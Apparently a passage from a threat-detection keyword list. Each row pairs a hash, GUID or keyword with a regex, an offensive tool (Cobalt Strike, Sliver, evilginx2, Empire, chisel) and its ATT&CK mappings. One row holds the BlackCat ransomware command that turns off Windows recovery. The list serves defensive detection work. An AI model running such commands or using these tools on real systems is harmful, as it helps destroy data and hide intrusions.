"*bcd23b279a6821e726d190afb11762f53741de0c8ee4724925a3c908e55725b5*",".{0,1000}bcd23b279a6821e726d190afb11762f53741de0c8ee4724925a3c908e55725b5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bcdedit.exe /set {default} recoveryenabled No*",".{0,1000}bcdedit\.exe\s\/set\s\{default\}\srecoveryenabled\sNo.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bced4fc981001259eacc23145a5968deda2cfaf64db8e3ffebf2b6ae5bcda874*",".{0,1000}bced4fc981001259eacc23145a5968deda2cfaf64db8e3ffebf2b6ae5bcda874.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bcfe13901d4207db340d957052cd5175e24481a5e2c5fc15d119fadedc664755*",".{0,1000}bcfe13901d4207db340d957052cd5175e24481a5e2c5fc15d119fadedc664755.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*BCHASH-Rijndael-128.unverified.test-vectors.txt*",".{0,1000}BCHASH\-Rijndael\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*BCHASH-Rijndael-256.unverified.test-vectors.txt*",".{0,1000}BCHASH\-Rijndael\-256\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*bcrossc2_load_dyn*",".{0,1000}bcrossc2_load_dyn.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*BC-SECURITY*",".{0,1000}BC\-SECURITY.{0,1000}","offensive_tool_keyword","Github Username","Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.","T1021 - T1024 - T1027 - T1059 - T1074 - T1053","TA0008 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BC-SECURITY*Malleable*",".{0,1000}BC\-SECURITY.{0,1000}Malleable.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 Profiles. 
A collection of profiles used in different projects using Cobalt Strike & Empire.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*bc-security/empire*",".{0,1000}bc\-security\/empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - 
T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*BC-SECURITY/Starkiller*",".{0,1000}BC\-SECURITY\/Starkiller.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" 
"*bd326bcb0c8473cbae427c5e7cdfdb9b9cdab27d0df73f67c704eeb962f8db96*",".{0,1000}bd326bcb0c8473cbae427c5e7cdfdb9b9cdab27d0df73f67c704eeb962f8db96.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bd346689-8ee6-40b3-858b-4ed94f08d40a*",".{0,1000}bd346689\-8ee6\-40b3\-858b\-4ed94f08d40a.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*bd43503a9105de8acb54f9dc566d68f3bb7d9b75fdb2ceb5fe939d52791bfdf5*",".{0,1000}bd43503a9105de8acb54f9dc566d68f3bb7d9b75fdb2ceb5fe939d52791bfdf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bd514bc9dda0863e30e834afcf4d5b406c228f10a980ad3f434867d5aa6ef592*",".{0,1000}bd514bc9dda0863e30e834afcf4d5b406c228f10a980ad3f434867d5aa6ef592.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BD602C80-47ED-4294-B981-0119D2200DB8*",".{0,1000}BD602C80\-47ED\-4294\-B981\-0119D2200DB8.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*bd63af36618538f67b2bf90652fb7536b40c915b307a69887df67bd5cf0400b6*",".{0,1000}bd63af36618538f67b2bf90652fb7536b40c915b307a69887df67bd5cf0400b6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform 
adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*",".{0,1000}BD745A5E\-A1E9\-4FDD\-A15B\-E9F303A625AE.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*",".{0,1000}bd745a5e\-a1e9\-4fdd\-a15b\-e9f303a625ae.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*bd7552c78fd3f852e39b140051c4a1aa5a30a14e23eee49cfb570e19b4dbb0fa*",".{0,1000}bd7552c78fd3f852e39b140051c4a1aa5a30a14e23eee49cfb570e19b4dbb0fa.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*bd78ea00b16797551d4f40297f42e9b1f9d912f416a115c3eb10f340246a9d54*",".{0,1000}bd78ea00b16797551d4f40297f42e9b1f9d912f416a115c3eb10f340246a9d54.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - 
TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*bd852d46ed2140ee627ff0798c12d589db9687c7de1b23160fe02a5570163d54*",".{0,1000}bd852d46ed2140ee627ff0798c12d589db9687c7de1b23160fe02a5570163d54.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bd976ca9268513e6cc4a58b85574f62b8a76cc92*",".{0,1000}bd976ca9268513e6cc4a58b85574f62b8a76cc92.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*bd99cb3ea030932e00edee60aa4a03d9fdc70d031adaa389d8c6ab12982efcaa*",".{0,1000}bd99cb3ea030932e00edee60aa4a03d9fdc70d031adaa389d8c6ab12982efcaa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bda4e12386c2e02081373da1ac905a6fba42ecdb2310d06aa2dc6df8b71ef544*",".{0,1000}bda4e12386c2e02081373da1ac905a6fba42ecdb2310d06aa2dc6df8b71ef544.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bdamele/icmpsh*",".{0,1000}bdamele\/icmpsh.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bdcfb9b63fd01bdd50427f205338e26e8001015b4fe14b6016cfb08e37c08a6e*",".{0,1000}bdcfb9b63fd01bdd50427f205338e26e8001015b4fe14b6016cfb08e37c08a6e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*bdcsync*",".{0,1000}bdcsync.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bde38d20d4eb1a86cc38a81cc92861b3d366210af570ecb6fea93ac1060eaa7d*",".{0,1000}bde38d20d4eb1a86cc38a81cc92861b3d366210af570ecb6fea93ac1060eaa7d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*BDED2735-F9E4-4B2E-9636-4EEDD78FC720*",".{0,1000}BDED2735\-F9E4\-4B2E\-9636\-4EEDD78FC720.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*bdf7dee28fc21a09ae10d5e3a75e3a7713e705e78a40f55a4c003c9358174372*",".{0,1000}bdf7dee28fc21a09ae10d5e3a75e3a7713e705e78a40f55a4c003c9358174372.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*BDFEE233-3FED-42E5-AA64-492EB2AC7047*",".{0,1000}BDFEE233\-3FED\-42E5\-AA64\-492EB2AC7047.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - 
TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*bdllinject*",".{0,1000}bdllinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bdllinject*",".{0,1000}bdllinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bdllload*",".{0,1000}bdllload.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bdllload*",".{0,1000}bdllload.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations 
and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bdllspawn*",".{0,1000}bdllspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 